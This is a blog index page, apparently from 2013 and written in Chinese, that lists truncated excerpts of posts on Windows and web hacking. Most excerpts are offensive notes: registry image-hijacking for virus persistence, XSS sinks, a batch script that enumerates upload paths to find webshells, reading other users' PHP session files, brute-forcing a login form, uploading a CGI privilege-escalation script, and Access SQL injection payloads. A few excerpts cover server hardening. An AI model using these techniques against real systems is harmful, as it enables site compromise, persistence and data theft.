上一页 1 ··· 5 6 7 8 9 10 11 12 13 ··· 17 下一页
该文被密码保护。 阅读全文
posted @ 2013-09-04 23:03 群叔 阅读(9) 评论(0) 推荐(0) 编辑
摘要: 所谓的镜像劫持,就是在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\ CurrentVersion\Image File Execution Options]处新建一个以一个软件主程序命名的项,例如Rav.exe,sethc.exe。然后再创建一个子键“Debugger="C:\WINDOWS\system32\drivers\”。以后只要用户双击 Rav.exe就会运行的病毒文件,类似文件关联的效果. 阅读全文
posted @ 2013-09-03 17:57 群叔 阅读(145) 评论(0) 推荐(0) 编辑
摘要: XSS常被利用的脚本:URL相关操作document.location=…document.location.hostname=…document.location.replace(…)document.location.assign(…)document.URL=…document.referre... 阅读全文
posted @ 2013-09-03 16:55 群叔 阅读(357) 评论(0) 推荐(0) 编辑
摘要: 首先,需要开启的服务:Workstation Telephony Remote Access Connection Manager Remote Access Auto Connection Manager remote RegistryServerRouting and Remote Access需要禁用的服务windows firewall/internet connection sharing(ICS)第一步:添加服务器的“路由和远程访问”功能 1、点击“开始”——“管理工具”——“管理您的服务器” 2、在“管理您的服务器”窗口点击“添加或删除角色” 3、点击“下一步” 系统会自... 阅读全文
posted @ 2013-09-02 10:00 群叔 阅读(69) 评论(0) 推荐(0) 编辑
摘要: 上传马后,地址找不到,或者扫描他人马 的批处理:@echo off for %%a in (20121001032)do ( for %%b in (0 1 2 3 4) do ( for %%c in (0 1 2 3 4 5 6 7 8 9) do ( for %%d in (0 1 2 3 4 5 6 7 8 9) do ( for %%e in (0 1 2 3 4 5 6 7 8 9) do ( for %%f in (0 1 2 3 4 5 6 7 8 9) do ( echo uploadfile/2011/10/%%a%%b%%c%%d%%e%%f.asp >>da 阅读全文
posted @ 2013-09-01 20:44 群叔 阅读(453) 评论(0) 推荐(0) 编辑
摘要: 配置选项phpinfo( ) 函数可用于php.ini文件的定位A.1. allow_url_fopen选项允许你如同本地文件一样引用远程资源:我推荐关闭allow_url_fopen选项,除非你的应用需要它。A.2. disable_functionsdisable_functions选项是非常有... 阅读全文
posted @ 2013-09-01 01:25 群叔 阅读(353) 评论(0) 推荐(0) 编辑
摘要: 会话数据暴露当你关注于防止源码的暴露时,你的会话数据只同样存在着风险。在默认情况下,SESSION保存在/tmp目录下。这样做在很多情形下是很方便的,其中之一是所有用户都有对/tmp的写入权限,这样Apache同样也有权限进行写入。虽然其他用户不能直接从shell环境读取这些会话文件,但他们可以写一个简单的脚本来进行读取:read()) { if (substr($filename, 0, 5) == 'sess_') { $data = file_get_contents("$path/$filename"); if (!empty($data)) ... 阅读全文
posted @ 2013-09-01 01:14 群叔 阅读(303) 评论(0) 推荐(0) 编辑
摘要: 考虑下面的HTML表单:CODE:Username: Password: 攻击者会察看这个表单并建立一段脚本来POST合法的数据给http://example.org/login.php:使这段脚本,攻击者还可以简单地加入一个循环来继续尝试不同的密码,并在每次尝试后检查$http_response变量。一旦$http_response变量有变化,就可以认为猜测到了正确的密码。 阅读全文
posted @ 2013-09-01 00:47 群叔 阅读(472) 评论(0) 推荐(0) 编辑
摘要: windows 2003 下,安装ActivePerl-5.16.2.1602-MSWin32-x86-296513IIS 添加CGI支持。并在对应网站配置下面,添加CGI后缀或PL后缀 与 对应的perlis.dll此时,网站支持HTTP访问CGI 或者 .pl脚本。可以用来提取,.CGI .PL权限比较大,大于ASPX。首先上传CGI 提权执行脚本:#!/usr/bin/perlbinmode(STDOUT);syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);$_ = $ENV{QUERY_STRING};s 阅读全文
posted @ 2013-08-28 23:10 群叔 阅读(711) 评论(0) 推荐(0) 编辑
摘要: ACCESS的注入,基本是死的。思路很简单,基本都可以工具解决。上代码:1、判断有无注入点' and 1=1 and 1=22、猜表一般的表的名称无非是admin adminuser user pass password and 0(select count(*) from *) and exists (select * from admin)and 0(select count(*) from admin)3、爆破帐号数目 如果遇到00)--and 1=(select count(*) from admin where len(username)>0)and 1=(select 阅读全文
posted @ 2013-08-28 11:55 群叔 阅读(573) 评论(0) 推荐(0) 编辑
上一页 1 ··· 5 6 7 8 9 10 11 12 13 ··· 17 下一页